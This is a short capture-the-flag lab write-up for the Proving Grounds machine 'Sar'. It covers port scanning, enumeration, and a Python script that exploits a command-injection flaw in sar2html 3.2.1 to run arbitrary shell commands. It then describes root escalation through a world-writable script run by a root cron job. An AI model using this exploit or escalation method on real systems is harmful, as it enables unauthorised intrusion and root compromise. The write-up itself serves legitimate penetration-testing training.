Proving Grounds (OSCP) - Sar
This was a fairly easy machine, I began with a nmap scan:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
On port 80 there was a blank website, so I fuzz it and found bunch of files.
http://192.168.210.35/robots.txt -> http://192.168.210.35/sar2HTML/
http://192.168.210.35/phpinfo.php
Using the phpinfo I have enumerated the versions
sar2html Ver 3.2.1 <-- Vulnerable
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64
Apache/2.4.29
PHP 7.1.32-1+ubuntu18.04.1+deb.sury.org+1
exif 7.1.32-1+ubuntu18.04.1+deb.sury.org+1 - JPEG,TIFF
mysqlnd 5.0.12-dev - 20150407
Net_SFTP_Stream 0.3.2 SFTP Stream Wrapper
sar2html Was vulnerable to RCE, and I’ve created a python script to exploit it further.
import bs4
import requests
url = "http://<ip>/sar2HTML/index.php?plot=;"
while True:
command = input("$ ")
if command == "exit":
break
else:
response = requests.get(url + command.replace(" ", "%20"))
html = response.text
soup = bs4.BeautifulSoup(html, "html.parser")
sel_tag = soup.find("select", {"class": "select_text"}).children
for c in sel_tag:
if c.text == "Select Host":
continue
if c.text == "There is no defined host...":
continue
print(c.text)
Using this script, you can read the user/local.txt file to get the first flag.
I then run the linpeas script to check how to privilege escalation, I’ve noticed that there was a cron job that was running on the *.sh files in the /var/www/html folder:
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
finally.sh is actually calling write.sh which is writable by the www-data
-rwxrwxrwx 1 www-data www-data 55 Mar 5 15:32 write.sh
I’ve used the following script to get the root proof.txt
# write.sh
cat /root/proof.txt > /var/www/html/hash.txt
Then I waited 5m to get the flag, I’ve done it this way since I got problems setting up the reverse shell, nonetheless I got root.